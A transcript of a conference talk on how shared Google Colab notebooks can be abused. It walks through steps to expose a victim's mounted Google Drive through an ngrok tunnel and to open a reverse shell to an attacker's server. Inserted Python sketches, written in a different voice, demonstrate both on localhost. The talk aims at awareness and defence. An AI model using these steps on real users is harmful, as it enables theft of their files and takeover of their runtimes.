Let me introduce Antonio. Well, I'd like to welcome to the stage Antonio Piazza, who's going to present "Careful Who You Colab With: Abusing Google Colaboratory." Antonio Piazza, hailing from Cleveland, Ohio, USA, is a purple team leader and offensive security engineer at NVIDIA. Following his stint as a US Army Human Intelligence Collector (you and I should talk after your talk), he worked as a defense contractor operator on an NSA red team. So he's intimately familiar with spies, hacking, and nerd stuff. Antonio is passionate about all things related to macOS security and hacking, and thus spends his days researching macOS internals and security, as well as writing free, open-source red team tools for use in the defense against the dark arts. Oh, that sounds cool. As of late, he has been planning to implement machine learning into red teaming with his NVIDIA colleagues. So please welcome Antonio. Oh, sorry, I have to give you access, I guess. Let me do that real quick. I was looking for your name and not your handle. There we go. Okay, you have access. Make sure to pick up a microphone to get megaphone access. Just point your pointer at one of the microphones and it'll change from a circle to a funny-looking icon, and then left-click it to pick it up. Is that right? Left click, right click. I don't know why my icon's not changing. He has megaphone enabled, so he's good. Okay. Yeah. These controls, that'd be wonderful. Okay. Thanks everyone, I really appreciate you coming and listening to this. Can everyone hear me okay before I start going on? This is my first time formally doing anything in VR, so hopefully it goes well. I'm gonna be looking at my slides a lot, so yell at me if something happens. So anyway, when I started this research, I was toying around with the idea of creating a startup that would provide a service to artists that would allow them to gain inspiration through AI.
That was kind of the premise of the startup idea I had. And I wanted to start with music, because that's where my passion is. The idea was that a musician who needs inspiration for writing their next song could submit some samples of their music, or of songs they wish to emulate or gain inspiration from, and the AI would then throw together a bunch of riffs similar to, but not the same as, the style that the user submitted. I started using Google Colaboratory and getting involved in the AI art and music community, including the Dadabots Discord channel, and reading white papers concerning SampleRNN. I didn't have a great GPU on my own computer at the time, and they were super expensive and hard to get. Not anymore, thanks to me working at NVIDIA. Some AI researchers in the community directed me to Google Colaboratory. So I started playing with it and found it to be a great tool for AI collaboration, and you get a free GPU, which is really nice. So this research didn't start with anything to do with security. Next slide, please. Then a researcher in the Dadabots Discord was involved in another project called OpenAI Jukebox. This platform allows the user to train the AI by feeding it a song and whatever written lyrics the user wishes, and the AI will give you in return a song where the artist sings the lyrics you provide. So I was playing around, trying to get Elvis to sing the lyrics of Sir Mix-a-Lot's "Baby Got Back" in the style of "Suspicious Minds." Next slide, please. And a researcher, Brokkaloo, from the OpenAI Jukebox research project, helped me out by tweaking some of the configurations in my Google Colab file, which he shared with me via this Discord message. I opened the file in Colab as normal and, again as normal, began the process of mounting my Google Drive in Colab. And this is when it hit me.
When I mounted my Google Drive, this prompt came up on the screen. I don't know if you can read it, but it says: this notebook is requesting access to your Google Drive files. Granting access to Google Drive will permit code executed in the notebook to modify files in your Google Drive. Make sure to review notebook code prior to allowing this access. And that's where the security research began for this. So next slide, please. And again, the talk is titled "Careful Who You Colab With: Abusing Google Colaboratory." Next slide, please. And I am Antonio Piazza. I go by antman1p on the Twitters. I'm an offensive security engineer. Most of my security experience is strictly red teaming. I've worked at Zoom, Box, the Cleveland Clinic, and on an NSA red team as a defense contractor. And now I am the purple team leader at NVIDIA on the threat operations team. That Odin logo down there, I have some stickers. If you're here at DEF CON, I'll be down in the AI Village after this talk and I'll hand them out if you want some. I'm also in my final course of the Master of Science in Information Security Engineering program at SANS Technology Institute. I'm a father of five, a husband, and again, I love music. Next slide, please. So the agenda here is pretty brief. We're gonna discuss what Google Colaboratory is, just to make sure everyone's familiar, since some of you might not know it. We're gonna talk about how we can abuse Google Colab, and then we're just gonna kind of conclude. Next slide, please. So what is Google Colaboratory? I'll let Google define it, because I think they describe it best: Colaboratory, or Colab for short, is a product from Google Research. Colab allows anybody to write and execute arbitrary Python code through the browser, and is especially well suited to machine learning, data analysis, and education.
More technically, Colab is a hosted Jupyter notebook service that requires no setup to use, while providing access free of charge to computing resources, including GPUs. Colab resources are not guaranteed and not unlimited, and the usage limits sometimes fluctuate. So if you're interested in having reliable access and better resources, you can purchase Colab Pro, which is, I think, about $50 a month. What is the difference between Jupyter and Colab? Jupyter is the open-source project on which Colab is based. Colab allows you to use and share Jupyter notebooks with others without having to download, install, or run anything. So that's the example I gave of Brokkaloo sharing a Colab file with me; he was actually sharing a Jupyter notebook file. Next slide, please. How is Colab normally used? You can write your own notebooks, which are stored in your Google account's Google Drive. Basically, you write Python code in a Jupyter notebook cell and you execute the cells by pushing the execute button. When you open or start a notebook, you connect it to a Colab runtime, and that's where you get your GPU and other resources, and they start to spin up and start running. And you also may connect your notebook to your Google Drive. So in the slide here, in the picture, I've got arrows pointing to a Jupyter cell, and you can see the little black play button, which is how you run a cell. And then in the upper right-hand corner, it's showing you your resource usage for your runtime. Next slide, please. How is Colab normally used, continued? You can import Python libraries, just as you normally do in Python. You can install dependencies with pip, and you can clone Git repos, all in these Jupyter notebook cells. Next slide, please. You also have a Colab terminal. So once connected to the Colab runtime, you have a terminal that you can use to run shell commands, and once connected to Drive, you can navigate the connected Google Drive file system.
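The normal workflow just described can be sketched as a few hypothetical Colab notebook cells. This is Colab-only notebook code (the `google.colab` module and the bang-prefixed shell lines only work inside a Colab runtime, not in plain Python), and the library and repo names are placeholders:

```
# Cell 1: mount Google Drive (this triggers the access prompt)
from google.colab import drive
drive.mount('/content/drive')

# Cell 2: install a dependency with pip ("!" runs a shell command)
!pip install librosa

# Cell 3: clone a Git repo into the runtime (placeholder URL)
!git clone https://github.com/example/some-ml-project.git

# Cell 4: browse the mounted Drive from a cell via a system alias
!ls /content/drive/MyDrive
```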
Question: where is my code executed? What happens to my execution state if I close the browser window? The code is executed in a virtual machine private to your account. Virtual machines are deleted when idle for a while, and have a maximum lifetime enforced by the Colab service. I haven't sat down and tried to figure out what that time is, but that's something I'll probably do in the future. It seems to last a while as long as you're active. Next slide, please. Finally, I wanna touch on system aliases. So Jupyter has a number of system aliases, basically command shortcuts to common operations such as ls, cat, ps, kill, just normal *nix built-in commands. You can execute these from a Jupyter notebook cell by adding the bang, or exclamation point, before the command. So bang ls will run the ls command. Next slide, please. All right, so how is this abusable? Let's recap. If I'm an adversary and I share a Colab file, a Jupyter notebook, with someone, and they choose to use my file, they must mount their Google Drive and execute it. So that's key, right? They would be executing the malicious code I sent them. The adversary could potentially access all of the contents of a victim's Google Drive and exfiltrate anything they choose at that point. The adversary can edit the victim's Colab files to create backdoors that might then exploit other users that the victim collaborates with. You can have a reverse shell on the Colab virtual machine, the runtime we're talking about. Is there a possibility to do a VM escape? Maybe. All this could be as simple as sending a phishing email with a link to a malicious Colab file, or sending a link to a malicious Colab file in an AI community Discord server, just like the ones I hang out in, and kind of the way that Brokkaloo shared the file with me. I gotta say, the one he shared with me was not malicious. By the way, I scared him when he saw these slides.
He thought, like, oh my God, did I send you something malicious? I'm like, no, no, no. I just got my brain working like an adversary. So you can hide malicious code in Jupyter cells. You can hide it in Git repos, since you can clone Git repos into your Jupyter notebook. So there's a number of ways. Next slide, please. So, for a clear understanding of what an attacker might have access to if they successfully gain access to a victim's Colab runtime or their Google Drive, here are the permissions that one grants when mounting a Google Drive for a Colab session. If you're having a hard time seeing these, I can read them real quick: see, edit, create, and delete all of your Google Drive files; view the photos, videos, and albums in your Google Photos; retrieve mobile client configuration and experimentation; view your Google People information such as profiles and contacts, which is basically all the contacts you have in your Google account, including your phone or your Gmail; see, edit, create, and delete any of your Google Drive documents. Next slide, please. To see what an attacker might do, we can take a look at MITRE ATLAS. So ATLAS stands for Adversarial Threat Landscape for Artificial-Intelligence Systems. It's a knowledge base of adversary tactics, techniques, and case studies for machine learning systems, based on real-world observations, demonstrations from machine learning red teams and security groups, and the state of what's possible from academic research. ATLAS is basically modeled after the MITRE ATT&CK framework, which people are commonly more familiar with, and its tactics and techniques are complementary to those in MITRE ATT&CK. So how can an attacker do this? Well, for initial access, we discussed phishing the AI community or ML research community via email or Discord servers. MITRE ATLAS has a machine learning supply chain compromise technique under the initial access tactic that might make sense.
So maybe we can add a sub-technique there for Jupyter notebook sharing. Also, user execution under the execution tactic: an attacker might hide a backdoor in a Jupyter cell, or maybe hide a backdoor in a Git repo that the notebook clones. Next slide, please. This is an example of hiding malicious code in Jupyter notebook cells. On the left is code that will give an adversary access to the victim's Google Drive. Were an adversary to share this notebook, a victim might easily recognize that this is not AI/ML code; the one on the left is all just for an adversary getting access to the victim's Drive. But some of the AI and ML notebooks are quite large, as you can see on the right; that's not even the whole thing, and I zoomed out as far as possible to take that screenshot. An adversary might be able to hide the malicious bits within normal machine learning code. So the image on the right is just one small piece from a Colab project that an AI community member shared with me. Nothing malicious in there, just an example of how much code there is in which an adversary could hide malicious cells and malicious code. Next slide, please. Okay, so this is the example of the malicious code by the numbers, right? Imagine you receive a link to a Colab file and you open it. If you run all of this, you will give the sender access to all the files in your Google Drive via ngrok. The first thing in the code is where the victim's gonna mount their Google Drive. And again, this is normal behavior for all Colab files, right? In order to persist and store the data created from running one of these, you have to store it somewhere, and when you're in the cloud, you're gonna mount it or you're gonna store it. The next step, you're gonna wget the ngrok tarball and untar it. The third step is you register your attacker ngrok API key.
So it's a bit dangerous for an attacker to, I guess, hard-code an API key, but an attacker can always change it when they're done pillaging, or if they're unsuccessful with the attack. So it's not too bad. Step four is start a Python server on a specified port, like 9999 in this case, and then run ngrok on the same port in step five. Next slide, please. So this is a video demo. I don't know, are you able to run the videos from this presentation? I don't know if that problem was solved, or if anybody can hear me. Should be running right now. Oh, it's running. Okay, I can't see it, but I'll just go ahead. So the victim will run the Colab file and mount their drive. So you can see, off screen, I'm picking my Gmail account and allowing the Drive access, as I showed in the image earlier. And now I could navigate the file system on the left if I wanted. So, installing Python requests; don't really need it here, but I wanna show how you can use pip if needed. I do a pwd to show the current location in the Google Drive file system. And then I curl ifconfig.me to show my cloud VM IP address. wget to download ngrok, tar to untar ngrok, run ngrok config to add my API key, run the Python server to serve the Google Drive root directory, run ngrok, and then on the attacker side, the attacker goes to the ngrok agents page. Is there a way to, like, tilt my view so I can look up and see the slides? I'm, like, looking down. Yes, move your mouse forward. Oh, there it is. Okay, oh, did something go wrong? No, it's just a minute behind, did you rewind it a bit? No, no, you're okay, I think. So on the attacker side, the attacker goes to the ngrok agents page, and you might have seen there that the IP address of the agent matched what I got from curling ifconfig.me. And then we're in, so we can navigate the Google Drive file system and download whatever we want from the victim.
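Step four of the walkthrough, serving the mounted Drive with a Python web server so the ngrok tunnel can expose it, is just Python's built-in HTTP server pointed at a directory. Here's a minimal local sketch, with a temporary directory standing in for `/content/drive`, an illustrative file name, and the ngrok tunnel omitted:

```python
# Sketch of the "serve the Drive root" step, with a local stand-in
# directory instead of an actual mounted Google Drive.
import functools
import http.server
import os
import socketserver
import tempfile
import threading
import urllib.request

root = tempfile.mkdtemp()  # stand-in for /content/drive
with open(os.path.join(root, "secret.txt"), "w") as f:
    f.write("exfil-me")

# Equivalent in spirit to running `python3 -m http.server 9999` from the Drive root
handler = functools.partial(http.server.SimpleHTTPRequestHandler, directory=root)
server = socketserver.TCPServer(("127.0.0.1", 0), handler)
port = server.server_address[1]
threading.Thread(target=server.serve_forever, daemon=True).start()

# Anyone who can reach this port (e.g. through an ngrok tunnel) can fetch files
data = urllib.request.urlopen(f"http://127.0.0.1:{port}/secret.txt").read()
print(data.decode())  # prints "exfil-me"
server.shutdown()
```

From here, pointing an ngrok agent at the same port is what turns this local listing into the browser-in-browser Drive view shown in the demo.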
So what you're seeing there is kind of a browser-in-browser representation of the victim's Google Drive. Next slide, please. Okay, so that was the example of being able to get into a victim's Google Drive, and this one is a reverse shell example. It's really just two simple steps for this one: basically, mount the victim's Google Drive, and then do a bash TCP reverse shell to the adversary's C2 server IP address. I didn't show a video for this, it's just so simple, but you get the idea of what a reverse shell is gonna look like. Next slide, please. Okay, so knowing all this, what is the problem? Quickly: GPUs are a little harder to find due to supply chain issues, and they're pretty expensive, whereas Colab is free and even Pro is cheap. AI and ML researchers are starting to use Colab more, and especially education sectors and universities are using something similar, these cheaper cloud-based notebook runtime environments. And researchers are collaborating and sharing, right? This is a pretty exciting time, where someone like me who's not super schooled in AI and ML can get their start, because there's just so much cool research going on there, and people are willing to share it, and you get to learn how to do all the crazy cool AI stuff. Where I think the problem comes in is that most AI and ML researchers and developers are not security experts, right? So, kind of like at the beginning of software engineering, nobody's really thinking about security. It took a while for that to change, and we're kind of back at square one with that, I think, with AI and ML researchers. The good news is security has been around for a while, and we saw the mistakes that were being made at the beginning with software engineering. So hopefully we can quickly jump in and start securing things in the machine learning and AI sector. And finally, phishing is easy, right?
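The two-step reverse shell described above boils down to the runtime making an outbound TCP connection back to the attacker and wiring a shell to it. A harmless local approximation, with both ends on localhost and a one-shot `echo` standing in for the interactive bash shell an attacker would actually attach:

```python
# Local approximation of a reverse shell: the "victim" connects out to the
# "attacker" listener and sends command output over the socket. A real
# attack would wire an interactive shell to the socket instead of `echo`.
import socket
import subprocess
import threading

received = []

def attacker_listener(srv):
    conn, _ = srv.accept()            # wait for the connect-back
    received.append(conn.recv(4096))  # capture whatever the victim sends
    conn.close()

srv = socket.socket()
srv.bind(("127.0.0.1", 0))            # attacker's C2 address (localhost here)
srv.listen(1)
port = srv.getsockname()[1]
t = threading.Thread(target=attacker_listener, args=(srv,))
t.start()

# "Victim" side: run a command and ship its output out over TCP
out = subprocess.check_output(["echo", "pwned"])
client = socket.socket()
client.connect(("127.0.0.1", port))
client.sendall(out)
client.close()

t.join()
srv.close()
print(received[0].decode().strip())  # prints "pwned"
```

The outbound-only connection is what makes this work from inside a Colab VM: the runtime doesn't need any inbound exposure, it just dials out to the attacker.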
Like, I've been on a lot of red teams, and it's a numbers game. If I send out 100 phish, I know I'm gonna get at least one, as long as they all make it through, you know, your email filters and everything. That's never really been a problem. So it's scary, but how can we fix it? Well, ML researchers and people who are collaborating should read the code someone shares with them. Let that Google Drive mount warning remind you every time: before I mount this, let me look through and make sure this code is good, that it's what I was expecting, and there's nothing weird in there. And I know that's difficult, because, again, in the example code that could be in one of these notebooks, it might be difficult to find those needles in the haystack, especially if the researcher doesn't know what to look for. So that's one thing I think, as security experts, we should probably start doing: educating machine learning and AI researchers in what bad looks like, right? So this is me hopefully getting something out into the security community, and hopefully this will spread from the security community into the ML research and AI community, and we'll start using our expertise to educate those folks on what bad looks like, so then they can search for that in their notebooks. Maybe develop a code-sharing plug-in, you know, in Google Drive; maybe Google can do that, or the open-source community can do that. Next slide, please. With that, thanks again. This is really cool, doing something for the first time in VR. Hopefully it went smoothly for everyone else. And again, I hope you got something out of this, and please feel free to ask any questions. I know I'm probably out of time here, but hopefully I can answer some questions. So, should this be fixed by Google, or do you think it should be on the user, basically, to kind of watch out themselves and make sure they don't download any malicious code?
You know, it's funny, because I've heard that question before. Basically, is this a problem that the users need to solve? Well, absolutely, but if you think about it, it's a community thing. Security education has been trying to push the responsibility onto the user, which ultimately is where it is in the end, but is that working? Are users listening? Especially if you're securing an enterprise or a corporate network or something, we would hope all the users would do due diligence, but it just never turns out that way, right? Like, I would love it if every person would be super vigilant when opening an email and not click on a link, right? But it just never happens. So yeah, I mean, I think there's always an end-user responsibility, but ultimately, I think we have to do our part as well, as security experts. Should Google do anything? In my opinion, they should have more than just that warning. But, you know, I've submitted several things to Google. I don't try to pick on Google, but I use Google a lot, so I end up finding things. I've submitted things, and the response is, like, oh, that works as intended, and I'm like, that doesn't seem like great security practice, but, you know, that's the response. I don't have an expectation that Google will do anything. I wish they would, but I think ultimately we're gonna have to rely on the open-source community to develop some plugins, or, again, help educate people. Next slide, please. I actually have one more slide. Sometimes I get, it's not really a question, but people want to hear the "Baby Got Back" thing with Elvis. I can play it if you want. I don't know if it will come through smoothly, I hope so. It's a work in progress, but it gets pretty crazy near the end, when the AI starts singing in some alien language.
It reminds me of the show Devs, when they had the weird background noise of the quantum computer speaking; it's kind of spooky. But anyway, any other questions? All right, well, thanks a lot. Again, I really appreciate it. Thank you, Antonio, for your presentation. We have to be careful, I guess, who we Colab with from here on out. I never thought of Jupyter notebooks being used in that way. That's quite clever.